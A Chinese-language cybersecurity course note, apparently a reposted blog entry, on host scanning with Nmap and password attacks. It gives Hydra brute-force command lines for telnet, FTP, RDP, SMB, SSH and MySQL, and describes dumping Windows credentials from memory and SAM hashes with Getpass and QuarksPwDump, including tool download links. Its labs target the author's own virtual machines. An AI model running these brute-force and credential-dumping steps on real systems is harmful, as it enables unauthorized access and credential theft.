【CyberSecurityLearning 10】扫描与爆破
目錄
掃描技術
基礎知識
@ 常見端口號
Nmap-掃描器之王
重要常用參數(區分大小寫)
遠程爆破軟件:九頭蛇(hydra-8.1-windows)?[?ha?dr?]?
本地破解
本地暴力破解:
工具:
實驗演示
實驗1:
實驗2:
掃描技術
掃描技術:就是掃描哪些人在線
一個一個ping?
手工與工具相結合
主機探測與端口掃描:
主機測探是指確定目標主機是否存活。
端口掃描就是尋找在線主機所開放的端口,并且在端口上所運行的服務。甚至可以進一步確定目標主機操作系統類型和更詳細的信息
基礎知識
@ 常見端口號
| 21 | FTP | 443 | HTTPS |
| 22 | SSH | 1433 | SQL Server |
| 23 | Telnet | 1521 | Oracle |
| 25 | SMTP(郵件發送協議) | 3306 | MySQL |
| 80 | HTTP | 3389 | RDP(遠程桌面協議) |
Nmap-掃描器之王
重要常用參數(區分大小寫)
| -sP(注意大小寫) | ping?掃描【掃描主機是否在線】 |
| -p | 指定端口或端口范圍 |
| -sV | 服務版本探測 |
| -O(大寫) | 啟用操作系統探測 |
| -A | 全面掃描 |
| -oN | 把掃描出來的結果保存為txt【生成報告】 |
Nmap ?-sP ?10.1.1.1/24? ? ?掃描10.1.1.0整個網段
Nmap -p 21,23 10.1.1.1? ? Nmap掃描10.1.1.1,且只掃描21,23這兩個端口號是否開啟(p=port)【掃描這個地址指定的若干個端口】
Nmap ?-p ?21,23-25,3389 10.1.1.1【23-25表示一個范圍】
Nmap ?-p ?21,23 10.1.1.1 -sV ?掃描21,23的服務版本(V=version),不是系統版本
Nmap ?-A ?10.1.1.1 ?全面掃描
Nmap ?-O ?10.1.1.1 ?掃描目標系統版本(還可以查看目標系統開放哪些端口號),不是服務版本
Namp ?-p ?21,23 ?10.1.1.1 ?-oN ?e:\result.txt(生成報告)
Namp ?-O? 10.1.1.1 ?-oN? d:\report.txt
?
記憶tip:凡是加-s的表示要掃描,-sP表示要掃描Ping,-sV表示要掃描版本Version
?
遠程爆破軟件:九頭蛇(hydra-8.1-windows)?[?ha?dr?]
九頭蛇這個軟件再kali系統上速度還是稍微慢一些,windows有的時候比kali快
Hydra -l 爆破對象用戶名?-p 密碼 10.1.1.1 telnet【-p后面寫具體密碼;-P后跟的不是具體的密碼,而是密碼字典,建議寫絕對路徑】
Hydra -l administrator?-P e:\pass.txt ?10.1.1.1 telnet 【-P后面跟密碼字典】
hydra -l administrator -P e:\pass.txt 10.1.1.1 ftp【要對10.1.1.1的ftp進行爆破】
Hydra -l a -P e:\pass.txt ?10.1.1.1 rdp【攻擊3389】
Hydra -l a -P e:\pass.txt ?10.1.1.1 smb【要想攻擊445,這就要寫445的服務,不是寫server,windows的共享服務有一個統一的名字叫smb】
Hydra -l a -P e:\pass.txt ?10.1.1.1 smb -vV 【顯示暴力破解的詳細過程,這個選項在windows里面不太好用,在kali用】
Hydra -l a -P e:\pass.txt ?10.1.1.1 ftp
Hydra -l a -P e:\pass.txt ?10.1.1.1 ssh
Hydra -l a -P e:\pass.txt ?10.1.1.1 mysql
Hydra -L e:\user.txt -P e:\pass.txt ?10.1.1.1 telnet【-L后面加用戶字典】
注:l和p,一個是指定用戶名,一個是指定密碼,小寫的是要指定確定的賬號和密碼,大寫的是要指定字典
?
?
-l????? 指定一個用戶名
-p???? 指定一個密碼
-P ? ? 指定密碼字典
-L ? ? 指定用戶名字典
-vV ?? 顯示爆破細節
-o???? 保存爆破結果
-f????? 找到正確密碼就停止爆破
-e
???? n??? 代表null
???? s??? 代表same
???? r???? 反向(比如把用戶名反向toor——root)
eg:hydra? -L? ../dic/usr.dic? -P? ../dic/winPass? smb://172.16.132.145? -vV? -f? -e? nsr
之前破解系統密碼學過:【近身爆破】
5次shift破解系統密碼
利用PE破解系統密碼
遠程爆破
nmap
NTscan
Hydra
本地破解
Getpass ??從內存中提取密碼(有32位和64位)
win7以前的系統密碼都能爆破(部分win10也行)
本地暴力破解:
Pwdump? ? pwdump命令可以提取sam中的HASH值
在DOS里面輸入QuarksPwDump.exe直接會彈出下面的框
-dhl是把SAM文件的哈希值調出來
QuarksPwDump.exe? -dhl ——》會報錯(因為只能用管理員身份運行)
?
手工將hash值存儲到hash.txt中
打開saminside文件夾里面有一個SAMInside.DIC字典文件
使用saminside軟件進行hash暴力破解(因為hash值不可逆只能爆破)
?
?
其實沒有這個軟件也行,只需要在網上找一個破解MD5的網站,把后面那串哈希值放進去就行
SAM文件里面用戶的格式怎么寫——》用戶名:用戶RID:LM哈希:NT哈希
工具:
(來自:https://www.cnblogs.com/edwinaze/p/12736224.html)
那個 getpass 我找了半天,只找到一個不知道是 x32 還是 x64 的版本
那個本地破 hash 的懶得找了,有個網站也能實現類似功能
MD5:https://www.cmd5.com/
getpass:?https://lanzous.com/ibmjwba(GetPassword密碼生成器)
pwdump:?https://lanzous.com/ibmjwaj
?
?
實驗演示
?
實驗1:
在真實機上使用nmap及hydra對虛擬機2003做掃描及爆破(對FTP、telnet、rdp、smb)
工具介紹:“掃描小王子”--Nmap(在kali系統內置且穩定)比scanport強大
? ? ? ? ? ? ? ? ? Hydra 九頭蛇(經典老牌的爆破軟件,它可以爆破網絡上任何一個需要身份驗證的端口,在kali系統內置)比NTscan強大(只能通過對445彈框做暴力破解)
接下來用真實機(windows10專業版)來演示Nmap和Hydra九頭蛇這兩個軟件:
開一臺win2003-2虛擬機【開啟23、445、3389、21端口號,創建了a用戶密碼為a】作為靶機
把win2003虛擬機橋接到vmnet1
將虛擬機win2003-2的IP地址設置為10.1.1.1,真實機的VMnet1網卡IP設置為10.1.1.100(子網掩碼都是255.255.255.0)
現在真實機既可以上網又可以連接虛擬世界
利用上面學的方法進行掃描爆破
?
實驗2:
在win7或2003中虛擬機中。練習本地系統密碼爆破
把getpass軟件復制到win2003-2的D盤(123.com這個密碼是以哈希值的名義存儲在SAM文件里面,不可逆的hash值)
getpass可以在cmd以命令的方式運行?
D:\> getpass.exe(用32位的軟件)
?
測試一下win7:
把getpass拷到E盤
E:\> GetPassord_64.exe(用64位的軟件)
win10更安全,用getpass不管用
?
?
總結
以上是生活随笔為你收集整理的【CyberSecurityLearning 10】扫描与爆破的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: BUUCTF-WEB:[极客大挑战 20
- 下一篇: 2017中国大数据技术大会12月在京召开